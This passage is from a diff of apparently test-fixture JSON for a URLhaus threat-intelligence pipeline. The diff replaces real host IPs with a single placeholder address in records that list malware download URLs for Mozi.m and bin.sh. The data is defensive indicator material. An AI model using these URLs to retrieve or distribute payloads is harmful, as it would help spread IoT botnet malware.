listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024621Z", + "original": "{\"id\":\"961523\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961523/\",\"url\":\"http://89.160.20.156:45653/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1300,18 +1300,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://103.217.121.228:41349/Mozi.m", + "original": "http://89.160.20.156:41349/Mozi.m", "scheme": "http", "port": 41349, - "domain": "103.217.121.228", - "full": "http://103.217.121.228:41349/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41349/Mozi.m" }, - "ip": "103.217.121.228" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692577798Z", - "original": "{\"id\":\"961520\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961520/\",\"url\":\"http://103.217.121.228:41349/Mozi.m\",\"url_status\":\"offline\",\"host\":\"103.217.121.228\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024628Z", + "original": "{\"id\":\"961520\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961520/\",\"url\":\"http://89.160.20.156:41349/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1348,18 +1348,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://111.92.81.255:48586/Mozi.m", + "original": "http://89.160.20.156:48586/Mozi.m", "scheme": "http", "port": 48586, - "domain": "111.92.81.255", - "full": "http://111.92.81.255:48586/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48586/Mozi.m" }, - "ip": "111.92.81.255" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692580884Z", - "original": "{\"id\":\"961521\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961521/\",\"url\":\"http://111.92.81.255:48586/Mozi.m\",\"url_status\":\"offline\",\"host\":\"111.92.81.255\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024635100Z", + "original": "{\"id\":\"961521\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961521/\",\"url\":\"http://89.160.20.156:48586/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1396,18 +1396,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://45.229.55.75:38111/Mozi.m", + "original": "http://89.160.20.156:38111/Mozi.m", "scheme": "http", "port": 38111, - "domain": "45.229.55.75", - "full": "http://45.229.55.75:38111/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38111/Mozi.m" }, - "ip": "45.229.55.75" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692584010Z", - "original": "{\"id\":\"961522\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961522/\",\"url\":\"http://45.229.55.75:38111/Mozi.m\",\"url_status\":\"offline\",\"host\":\"45.229.55.75\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024642300Z", + "original": "{\"id\":\"961522\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961522/\",\"url\":\"http://89.160.20.156:38111/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1444,18 +1444,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.121.242.148:34556/Mozi.m", + "original": "http://89.160.20.156:34556/Mozi.m", "scheme": "http", "port": 34556, - "domain": "182.121.242.148", - "full": "http://182.121.242.148:34556/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34556/Mozi.m" }, - "ip": "182.121.242.148" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692588799Z", - "original": "{\"id\":\"961518\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961518/\",\"url\":\"http://182.121.242.148:34556/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.121.242.148\",\"date_added\":\"2021-01-14 21:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024649400Z", + "original": "{\"id\":\"961518\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961518/\",\"url\":\"http://89.160.20.156:34556/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1493,18 +1493,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://106.115.189.249:59815/Mozi.m", + "original": "http://89.160.20.156:59815/Mozi.m", "scheme": "http", "port": 59815, - "domain": "106.115.189.249", - "full": "http://106.115.189.249:59815/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59815/Mozi.m" }, - "ip": "106.115.189.249" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692593087Z", - "original": "{\"id\":\"961519\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961519/\",\"url\":\"http://106.115.189.249:59815/Mozi.m\",\"url_status\":\"online\",\"host\":\"106.115.189.249\",\"date_added\":\"2021-01-14 21:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024656400Z", + "original": "{\"id\":\"961519\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961519/\",\"url\":\"http://89.160.20.156:59815/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1543,18 +1543,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://182.117.93.110:50587/bin.sh", + "original": "http://89.160.20.156:50587/bin.sh", "scheme": "http", "port": 50587, - "domain": "182.117.93.110", - "full": "http://182.117.93.110:50587/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50587/bin.sh" }, - "ip": "182.117.93.110" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692596974Z", - "original": "{\"id\":\"961516\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961516/\",\"url\":\"http://182.117.93.110:50587/bin.sh\",\"url_status\":\"online\",\"host\":\"182.117.93.110\",\"date_added\":\"2021-01-14 21:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.024663400Z", + "original": "{\"id\":\"961516\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961516/\",\"url\":\"http://89.160.20.156:50587/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1592,18 +1592,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://110.251.5.169:48322/Mozi.m", + "original": "http://89.160.20.156:48322/Mozi.m", "scheme": "http", "port": 48322, - "domain": "110.251.5.169", - "full": "http://110.251.5.169:48322/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:48322/Mozi.m" }, - "ip": "110.251.5.169" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692600400Z", - "original": "{\"id\":\"961517\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961517/\",\"url\":\"http://110.251.5.169:48322/Mozi.m\",\"url_status\":\"online\",\"host\":\"110.251.5.169\",\"date_added\":\"2021-01-14 21:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024670600Z", + "original": "{\"id\":\"961517\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961517/\",\"url\":\"http://89.160.20.156:48322/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1640,18 +1640,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://101.51.117.186:33317/Mozi.m", + "original": "http://89.160.20.156:33317/Mozi.m", "scheme": "http", "port": 33317, - "domain": "101.51.117.186", - "full": "http://101.51.117.186:33317/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33317/Mozi.m" }, - "ip": "101.51.117.186" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692603586Z", - "original": "{\"id\":\"961515\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961515/\",\"url\":\"http://101.51.117.186:33317/Mozi.m\",\"url_status\":\"online\",\"host\":\"101.51.117.186\",\"date_added\":\"2021-01-14 21:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024677800Z", + "original": "{\"id\":\"961515\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961515/\",\"url\":\"http://89.160.20.156:33317/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1688,18 +1688,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://121.151.78.166:41516/Mozi.m", + "original": "http://89.160.20.156:41516/Mozi.m", "scheme": "http", "port": 41516, - "domain": "121.151.78.166", - "full": "http://121.151.78.166:41516/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41516/Mozi.m" }, - "ip": "121.151.78.166" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692606983Z", - "original": "{\"id\":\"961513\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961513/\",\"url\":\"http://121.151.78.166:41516/Mozi.m\",\"url_status\":\"online\",\"host\":\"121.151.78.166\",\"date_added\":\"2021-01-14 21:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024685200Z", + "original": "{\"id\":\"961513\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961513/\",\"url\":\"http://89.160.20.156:41516/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1736,18 +1736,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://116.72.92.97:57798/Mozi.m", + "original": "http://89.160.20.156:57798/Mozi.m", "scheme": "http", "port": 57798, - "domain": "116.72.92.97", - "full": "http://116.72.92.97:57798/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57798/Mozi.m" }, - "ip": "116.72.92.97" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692610670Z", - "original": "{\"id\":\"961514\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961514/\",\"url\":\"http://116.72.92.97:57798/Mozi.m\",\"url_status\":\"online\",\"host\":\"116.72.92.97\",\"date_added\":\"2021-01-14 21:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024692200Z", + "original": "{\"id\":\"961514\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961514/\",\"url\":\"http://89.160.20.156:57798/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1784,18 +1784,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://27.218.15.209:47671/Mozi.m", + "original": "http://89.160.20.156:47671/Mozi.m", "scheme": "http", "port": 47671, - "domain": "27.218.15.209", - "full": "http://27.218.15.209:47671/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47671/Mozi.m" }, - "ip": "27.218.15.209" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692614006Z", - "original": "{\"id\":\"961509\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961509/\",\"url\":\"http://27.218.15.209:47671/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.218.15.209\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024699500Z", + "original": "{\"id\":\"961509\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961509/\",\"url\":\"http://89.160.20.156:47671/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1832,18 +1832,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://120.85.171.210:57690/Mozi.m", + "original": "http://89.160.20.156:57690/Mozi.m", "scheme": "http", "port": 57690, - "domain": "120.85.171.210", - "full": "http://120.85.171.210:57690/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57690/Mozi.m" }, - "ip": "120.85.171.210" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692617683Z", - "original": "{\"id\":\"961510\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961510/\",\"url\":\"http://120.85.171.210:57690/Mozi.m\",\"url_status\":\"online\",\"host\":\"120.85.171.210\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024734400Z", + "original": "{\"id\":\"961510\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961510/\",\"url\":\"http://89.160.20.156:57690/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1881,18 +1881,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://117.251.59.53:50611/i", + "original": "http://89.160.20.156:50611/i", "scheme": "http", "port": 50611, - "domain": "117.251.59.53", - "full": "http://117.251.59.53:50611/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50611/i" }, - "ip": "117.251.59.53" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692620799Z", - "original": "{\"id\":\"961511\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961511/\",\"url\":\"http://117.251.59.53:50611/i\",\"url_status\":\"online\",\"host\":\"117.251.59.53\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.024741400Z", + "original": "{\"id\":\"961511\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961511/\",\"url\":\"http://89.160.20.156:50611/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1929,18 +1929,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.58.83.167:34141/Mozi.m", + "original": "http://89.160.20.156:34141/Mozi.m", "scheme": "http", "port": 34141, - "domain": "115.58.83.167", - "full": "http://115.58.83.167:34141/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34141/Mozi.m" }, - "ip": "115.58.83.167" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692624476Z", - "original": "{\"id\":\"961512\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961512/\",\"url\":\"http://115.58.83.167:34141/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.58.83.167\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024748300Z", + "original": "{\"id\":\"961512\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961512/\",\"url\":\"http://89.160.20.156:34141/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 21:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -1978,18 +1978,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://94.178.124.83:44399/Mozi.m", + "original": "http://89.160.20.156:44399/Mozi.m", "scheme": "http", "port": 44399, - "domain": "94.178.124.83", - "full": "http://94.178.124.83:44399/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44399/Mozi.m" }, - "ip": "94.178.124.83" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692627702Z", - "original": "{\"id\":\"961507\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961507/\",\"url\":\"http://94.178.124.83:44399/Mozi.m\",\"url_status\":\"online\",\"host\":\"94.178.124.83\",\"date_added\":\"2021-01-14 20:52:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024755300Z", + "original": "{\"id\":\"961507\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961507/\",\"url\":\"http://89.160.20.156:44399/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2027,18 +2027,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.122.75.232:49120/Mozi.m", + "original": "http://89.160.20.156:49120/Mozi.m", "scheme": "http", "port": 49120, - "domain": "182.122.75.232", - "full": "http://182.122.75.232:49120/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49120/Mozi.m" }, - "ip": "182.122.75.232" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692630837Z", - "original": "{\"id\":\"961508\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961508/\",\"url\":\"http://182.122.75.232:49120/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.122.75.232\",\"date_added\":\"2021-01-14 20:52:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024762100Z", + "original": "{\"id\":\"961508\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961508/\",\"url\":\"http://89.160.20.156:49120/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2076,18 +2076,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.63.202.43:51136/Mozi.m", + "original": "http://89.160.20.156:51136/Mozi.m", "scheme": "http", "port": 51136, - "domain": "115.63.202.43", - "full": "http://115.63.202.43:51136/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51136/Mozi.m" }, - "ip": "115.63.202.43" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692634244Z", - "original": "{\"id\":\"961506\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961506/\",\"url\":\"http://115.63.202.43:51136/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.63.202.43\",\"date_added\":\"2021-01-14 20:52:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024769100Z", + "original": "{\"id\":\"961506\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961506/\",\"url\":\"http://89.160.20.156:51136/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2125,18 +2125,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.40.204:45773/Mozi.m", + "original": "http://89.160.20.156:45773/Mozi.m", "scheme": "http", "port": 45773, - "domain": "59.99.40.204", - "full": "http://59.99.40.204:45773/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45773/Mozi.m" }, - "ip": "59.99.40.204" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692637530Z", - "original": "{\"id\":\"961504\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961504/\",\"url\":\"http://59.99.40.204:45773/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.99.40.204\",\"date_added\":\"2021-01-14 20:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.024775800Z", + "original": "{\"id\":\"961504\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961504/\",\"url\":\"http://89.160.20.156:45773/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2174,18 +2174,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.247.128.213:56528/Mozi.m", + "original": "http://89.160.20.156:56528/Mozi.m", "scheme": "http", "port": 56528, - "domain": "117.247.128.213", - "full": "http://117.247.128.213:56528/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56528/Mozi.m" }, - "ip": "117.247.128.213" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.692640696Z", - "original": "{\"id\":\"961505\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961505/\",\"url\":\"http://117.247.128.213:56528/Mozi.m\",\"url_status\":\"online\",\"host\":\"117.247.128.213\",\"date_added\":\"2021-01-14 20:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": 